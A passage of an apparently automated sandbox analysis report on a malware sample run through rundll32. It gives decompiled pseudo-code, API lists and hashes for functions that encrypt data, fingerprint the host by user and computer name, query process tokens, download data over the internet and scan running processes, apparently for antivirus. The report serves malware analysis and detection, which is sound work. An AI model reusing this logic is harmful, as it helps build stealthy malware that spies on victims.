                                      0x04de310c
                                      0x04de31e6
                                      0x04de3112
                                      0x04de3112
                                      0x04de3115
                                      0x04de311b
                                      0x04de3121
                                      0x04de3121
                                      0x04de3129
                                      0x04de312b
                                      0x04de3130
                                      0x04de31d7
                                      0x04de3136
                                      0x04de313c
                                      0x04de313f
                                      0x04de3142
                                      0x04de3144
                                      0x04de3145
                                      0x04de314a
                                      0x04de314c
                                      0x04de314c
                                      0x04de3156
                                      0x04de315b
                                      0x04de315e
                                      0x04de3161
                                      0x04de3163
                                      0x04de316c
                                      0x04de3196
                                      0x04de316e
                                      0x04de317f
                                      0x04de317f
                                      0x04de319e
                                      0x00000000
                                      0x00000000
                                      0x04de31a0
                                      0x04de31a3
                                      0x04de31a6
                                      0x04de31aa
                                      0x00000000
                                      0x04de31ac
                                      0x04de31bb
                                      0x04de31c1
                                      0x04de31c9
                                      0x04de31c9
                                      0x00000000
                                      0x04de31aa
                                      0x04de31ae
                                      0x04de31b4
                                      0x04de31b9
                                      0x04de31d0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de31b9
                                      0x04de3130
                                      0x04de31e9
                                      0x04de31ec
                                      0x04de31ec
                                      0x04de3201
                                      0x04de3201
                                      0x04de3219

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04DE58B7), ref: 04DE30AA
                                      • memcpy.NTDLL(?,04DE58B7,00000010,?,?,?,?,?,?,?,?,?,?,04DE564C,00000000,04DE6D90), ref: 04DE30C3
                                      • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04DE30EC
                                      • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04DE3104
                                      • memcpy.NTDLL(00000000,04DE6D90,04DE58B7,0000011F), ref: 04DE3156
                                      • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04DE58B7,00000020,?,?,0000011F), ref: 04DE317F
                                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04DE58B7,?,?,0000011F), ref: 04DE3196
                                      • GetLastError.KERNEL32(?,?,0000011F), ref: 04DE31AE
                                      • GetLastError.KERNEL32 ref: 04DE31E0
                                      • CryptDestroyKey.ADVAPI32(?), ref: 04DE31EC
                                      • GetLastError.KERNEL32 ref: 04DE31F4
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04DE3201
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04DE564C,00000000,04DE6D90,04DE58B7,?,04DE58B7), ref: 04DE3209
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                      • String ID:
                                      • API String ID: 1967744295-0
                                      • Opcode ID: 5bb37f3fb022c7adaa62a17b087c796ec5b392180e5ba1d40496ad6ecf71deca
                                      • Instruction ID: 8d6c87b6899a22d18d8af61f374fdd54bb8b1b58fa4da99d65d2988fe1275973
                                      • Opcode Fuzzy Hash: 5bb37f3fb022c7adaa62a17b087c796ec5b392180e5ba1d40496ad6ecf71deca
                                      • Instruction Fuzzy Hash: 51511AB1A00209BFDB10AFA6DC84ABE7BB9FB44354F008429F915E7240D7769E54DB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE12D3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 171 4de12d3-4de12e7 172 4de12e9-4de12ee 171->172 173 4de12f1-4de1303 call 4de333b 171->173 172->173 176 4de1357-4de1364 173->176 177 4de1305-4de1315 GetUserNameW 173->177 178 4de1366-4de137d GetComputerNameW 176->178 177->178 179 4de1317-4de1327 RtlAllocateHeap 177->179 180 4de137f-4de1390 RtlAllocateHeap 178->180 181 4de13bb-4de13df 178->181 179->178 182 4de1329-4de1336 GetUserNameW 179->182 180->181 185 4de1392-4de139b GetComputerNameW 180->185 183 4de1338-4de1344 call 4de2087 182->183 184 4de1346-4de1355 HeapFree 182->184 183->184 184->178 187 4de13ac-4de13b5 HeapFree 185->187 188 4de139d-4de13a9 call 4de2087 185->188 187->181 188->187
                                      C-Code - Quality: 96%
                                      			E04DE12D3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4dea310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04DE333B( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4dea344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4dea2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04DE2087(_v8 + _v8, _t64);
							}
							HeapFree( *0x4dea2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4dea2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04DE2087(_v8 + _v8, _t64);
						}
						HeapFree( *0x4dea2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                      0x04de12d3
                                      0x04de12db
                                      0x04de12df
                                      0x04de12e2
                                      0x04de12e7
                                      0x04de12e9
                                      0x04de12ee
                                      0x04de12ee
                                      0x04de12f4
                                      0x04de12f6
                                      0x04de1303
                                      0x04de1364
                                      0x04de1305
                                      0x04de130a
                                      0x04de1310
                                      0x04de1315
                                      0x04de1323
                                      0x04de1327
                                      0x04de1336
                                      0x04de133d
                                      0x04de1344
                                      0x04de1344
                                      0x04de134f
                                      0x04de134f
                                      0x04de1327
                                      0x04de1315
                                      0x04de1366
                                      0x04de136c
                                      0x04de1376
                                      0x04de1378
                                      0x04de137d
                                      0x04de138c
                                      0x04de1390
                                      0x04de139b
                                      0x04de13a2
                                      0x04de13a9
                                      0x04de13a9
                                      0x04de13b5
                                      0x04de13b5
                                      0x04de1390
                                      0x04de13c0
                                      0x04de13c2
                                      0x04de13c5
                                      0x04de13c7
                                      0x04de13ca
                                      0x04de13cd
                                      0x04de13d7
                                      0x04de13db
                                      0x04de13df

                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE130A
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE1321
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE132E
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE134F
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04DE1376
                                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04DE138A
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04DE1397
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE13B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: HeapName$AllocateComputerFreeUser
                                      • String ID: FNwPq
                                      • API String ID: 3239747167-3591455833
                                      • Opcode ID: bfd4474d0ce5100f998706ad66a4b2bbd32f298b5d7d91424d3ca48891f419c7
                                      • Instruction ID: 6488a2caa3e34e8ceec7580cc93690c4d557fd7a383a90002d75972b70f0debb
                                      • Opcode Fuzzy Hash: bfd4474d0ce5100f998706ad66a4b2bbd32f298b5d7d91424d3ca48891f419c7
                                      • Instruction Fuzzy Hash: 0431F7B1B00206AFDB10EFAADC91A6EB7F9FB48300F614469E545D6251EB34EE019A10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5410 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 74%
                                      			E04DE5410(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04DE81C4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4dea348; // 0x6bd5a8
				_t5 = _t13 + 0x4deb87e; // 0x54a8e26
				_t6 = _t13 + 0x4deb59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04DE7E2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4dea34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                      0x04de5410
                                      0x04de5418
                                      0x04de541c
                                      0x04de5422
                                      0x04de5427
                                      0x04de542c
                                      0x04de542f
                                      0x04de5432
                                      0x04de5437
                                      0x04de5438
                                      0x04de543b
                                      0x04de5440
                                      0x04de5447
                                      0x04de5451
                                      0x04de5453
                                      0x04de5454
                                      0x04de5457
                                      0x04de5473
                                      0x04de5479
                                      0x04de547d
                                      0x04de54cb
                                      0x04de547f
                                      0x04de548c
                                      0x04de549c
                                      0x04de54a4
                                      0x04de54b6
                                      0x04de54ba
                                      0x00000000
                                      0x00000000
                                      0x04de54a6
                                      0x04de54a9
                                      0x04de54ae
                                      0x04de54b0
                                      0x04de54b0
                                      0x04de548e
                                      0x04de5490
                                      0x04de54bc
                                      0x04de54bd
                                      0x04de54bd
                                      0x04de548c
                                      0x04de54d2

                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53,?,?), ref: 04DE541C
                                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04DE5432
                                      • _snwprintf.NTDLL ref: 04DE5457
                                      • CreateFileMappingW.KERNELBASE(000000FF,04DEA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04DE5473
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53,?), ref: 04DE5485
                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04DE549C
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53), ref: 04DE54BD
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53,?), ref: 04DE54C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                      • String ID:
                                      • API String ID: 1814172918-0
                                      • Opcode ID: fcffb7a67ec2a276890e1ed901aac4126d7af9ad085852832f1551403064db69
                                      • Instruction ID: 5e51337da6b516d8d9965eb6ff9e0138ec9a993b968305ad65831aca441b55ae
                                      • Opcode Fuzzy Hash: fcffb7a67ec2a276890e1ed901aac4126d7af9ad085852832f1551403064db69
                                      • Instruction Fuzzy Hash: 7A21D5B2701214BBD711FBA6EC25FAE37B9EB84755F104061F609EB280E670EA04CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4695 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 38%
                                      			E04DE4695(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04DE4DF6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04DE4C73(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                      0x04de46a2
                                      0x04de46a3
                                      0x04de46a4
                                      0x04de46a5
                                      0x04de46a6
                                      0x04de46aa
                                      0x04de46b1
                                      0x04de46c0
                                      0x04de46c3
                                      0x04de46c6
                                      0x04de46cd
                                      0x04de46d0
                                      0x04de46d3
                                      0x04de46d6
                                      0x04de46d9
                                      0x04de46e4
                                      0x04de46e6
                                      0x04de46ef
                                      0x04de46f7
                                      0x04de46f9
                                      0x04de470b
                                      0x04de4715
                                      0x04de4719
                                      0x04de4728
                                      0x04de472c
                                      0x04de4735
                                      0x04de473d
                                      0x04de473d
                                      0x04de473f
                                      0x04de473f
                                      0x04de4747
                                      0x04de474d
                                      0x04de4751
                                      0x04de4751
                                      0x04de475c

                                      APIs
                                      • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04DE46DC
                                      • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04DE46EF
                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04DE470B
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04DE4728
                                      • memcpy.NTDLL(?,00000000,0000001C), ref: 04DE4735
                                      • NtClose.NTDLL(?), ref: 04DE4747
                                      • NtClose.NTDLL(00000000), ref: 04DE4751
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                      • String ID:
                                      • API String ID: 2575439697-0
                                      • Opcode ID: 71f63fa01f3f8e128916c94887f14af8342a3a3ac3af2b2c02bdc45d43c2c9e6
                                      • Instruction ID: cdeb6a8eb7ef41afa199c399b7d57847404564cb91b389279ab698d5135b5cbe
                                      • Opcode Fuzzy Hash: 71f63fa01f3f8e128916c94887f14af8342a3a3ac3af2b2c02bdc45d43c2c9e6
                                      • Instruction Fuzzy Hash: 3C21E9B1A00228BBDF01AF96CC459EEBFBDEF48750F104056F905EA210D7759A459BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4CC6 Relevance: 9.1, APIs: 6, Instructions: 112filenetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 390 4de4cc6-4de4cf3 ResetEvent InternetReadFile 391 4de4d24-4de4d29 390->391 392 4de4cf5-4de4d03 GetLastError 390->392 395 4de4d2f-4de4d3e 391->395 396 4de4dec 391->396 393 4de4d1c-4de4d1e 392->393 394 4de4d05-4de4d13 call 4de3a6f 392->394 393->391 398 4de4def-4de4df5 393->398 394->398 401 4de4d19 394->401 402 4de4de7-4de4dea 395->402 403 4de4d44-4de4d53 call 4de4df6 395->403 396->398 401->393 402->398 406 4de4dd9-4de4ddb 403->406 407 4de4d59-4de4d61 403->407 409 4de4ddc-4de4de1 406->409 408 4de4d62-4de4d87 ResetEvent InternetReadFile 407->408 412 4de4d89-4de4d97 GetLastError 408->412 413 4de4db0-4de4db5 408->413 411 4de4de5 409->411 411->398 414 4de4d99-4de4da7 call 4de3a6f 412->414 415 4de4dc0-4de4dca call 4de4c73 412->415 413->415 416 4de4db7-4de4dbe 413->416 414->415 421 4de4da9-4de4dae 414->421 415->409 422 4de4dcc-4de4dd0 call 4de56ec 415->422 416->408 421->413 421->415 424 4de4dd5-4de4dd7 422->424 424->409
                                      C-Code - Quality: 70%
                                      			E04DE4CC6(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				int _t43;
				long _t45;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4dea174(0, 1,  &_v12); // executed
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04DE4DF6(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_t43 = InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8); // executed
						if(_t43 != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04DE4C73(_v16);
							if(_t58 == 0) {
								_t45 = E04DE56EC(_v12, _t59); // executed
								_t58 = _t45;
							}
							goto L18;
						}
						_t58 = E04DE3A6F( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04DE3A6F( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}
















                                      0x04de4cc6
                                      0x04de4cd5
                                      0x04de4cda
                                      0x04de4cdc
                                      0x04de4cf3
                                      0x04de4d24
                                      0x04de4d29
                                      0x04de4dec
                                      0x04de4def
                                      0x04de4df5
                                      0x04de4df5
                                      0x04de4d36
                                      0x04de4d3e
                                      0x04de4de9
                                      0x00000000
                                      0x04de4de9
                                      0x04de4d49
                                      0x04de4d4e
                                      0x04de4d53
                                      0x04de4ddb
                                      0x04de4ddc
                                      0x04de4ddc
                                      0x04de4de2
                                      0x00000000
                                      0x04de4de2
                                      0x04de4d59
                                      0x04de4d5b
                                      0x04de4d61
                                      0x04de4d62
                                      0x04de4d62
                                      0x04de4d65
                                      0x04de4d68
                                      0x04de4d6e
                                      0x04de4d7f
                                      0x04de4d87
                                      0x00000000
                                      0x00000000
                                      0x04de4d8f
                                      0x04de4d97
                                      0x04de4dc0
                                      0x04de4dc3
                                      0x04de4dca
                                      0x04de4dd0
                                      0x04de4dd5
                                      0x04de4dd5
                                      0x00000000
                                      0x04de4dca
                                      0x04de4da3
                                      0x04de4da7
                                      0x00000000
                                      0x00000000
                                      0x04de4da9
                                      0x04de4dae
                                      0x00000000
                                      0x00000000
                                      0x04de4db0
                                      0x04de4db0
                                      0x04de4db5
                                      0x00000000
                                      0x00000000
                                      0x04de4db7
                                      0x04de4db8
                                      0x04de4dbb
                                      0x04de4dbb
                                      0x04de4d62
                                      0x04de4cfb
                                      0x04de4d03
                                      0x04de4d1c
                                      0x04de4d1e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de4d1e
                                      0x04de4d0f
                                      0x04de4d13
                                      0x00000000
                                      0x00000000
                                      0x04de4d19
                                      0x00000000

                                      APIs
                                      • ResetEvent.KERNEL32(?), ref: 04DE4CDC
                                      • InternetReadFile.WININET(?,?,00000004,?), ref: 04DE4CEB
                                      • GetLastError.KERNEL32 ref: 04DE4CF5
                                        • Part of subcall function 04DE3A6F: WaitForMultipleObjects.KERNEL32(00000002,04DE7B35,00000000,04DE7B35,?,?,?,04DE7B35,0000EA60), ref: 04DE3A8A
                                      • ResetEvent.KERNEL32(?), ref: 04DE4D6E
                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 04DE4D7F
                                      • GetLastError.KERNEL32 ref: 04DE4D89
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                                      • String ID:
                                      • API String ID: 3290165071-0
                                      • Opcode ID: 244eb35fd861550490835f7b8cbc6d5760a272ff45b73a4b0cb79835e6199a87
                                      • Instruction ID: 06f6ce6c1971098e678c127528741fe0b12505ab56e0fdee92ff2e6c65196674
                                      • Opcode Fuzzy Hash: 244eb35fd861550490835f7b8cbc6d5760a272ff45b73a4b0cb79835e6199a87
                                      • Instruction Fuzzy Hash: 81318E36A00604BBDB22BFA6DC44A7FB7BAFF84760F144668E551D7290EA30F9419B10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6DB6 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E04DE6DB6() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4dea348; // 0x6bd5a8
						_t2 = _t9 + 0x4debea8; // 0x73617661
						_push( &_v264);
						if( *0x4dea12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                      0x04de6dc1
                                      0x04de6dc6
                                      0x04de6dcb
                                      0x04de6dcf
                                      0x04de6dd9
                                      0x04de6e0a
                                      0x04de6de0
                                      0x04de6de5
                                      0x04de6df2
                                      0x04de6dfb
                                      0x04de6e12
                                      0x04de6dfd
                                      0x04de6e05
                                      0x00000000
                                      0x04de6e05
                                      0x04de6e13
                                      0x04de6e14
                                      0x00000000
                                      0x04de6e14
                                      0x00000000
                                      0x04de6e0e
                                      0x04de6e1a
                                      0x04de6e1f

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04DE6DC6
                                      • Process32First.KERNEL32(00000000,?), ref: 04DE6DD9
                                      • Process32Next.KERNEL32(00000000,?), ref: 04DE6E05
                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 04DE6E14
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3243318325-0
                                      • Opcode ID: 82eab527369eed38490d326d6c6ad11b1021d9b00589e8cbe70dbaf725e989ce
                                      • Instruction ID: a6de5298c908fc4c419178ef848db1350a9ffc241341a23d97ea45d0be993dc7
                                      • Opcode Fuzzy Hash: 82eab527369eed38490d326d6c6ad11b1021d9b00589e8cbe70dbaf725e989ce
                                      • Instruction Fuzzy Hash: 29F090726011286BDB20BA67DC08EFF76ACEBD5B54F804062EA45D7140EB34E95586B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE25D7 Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E04DE25D7(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
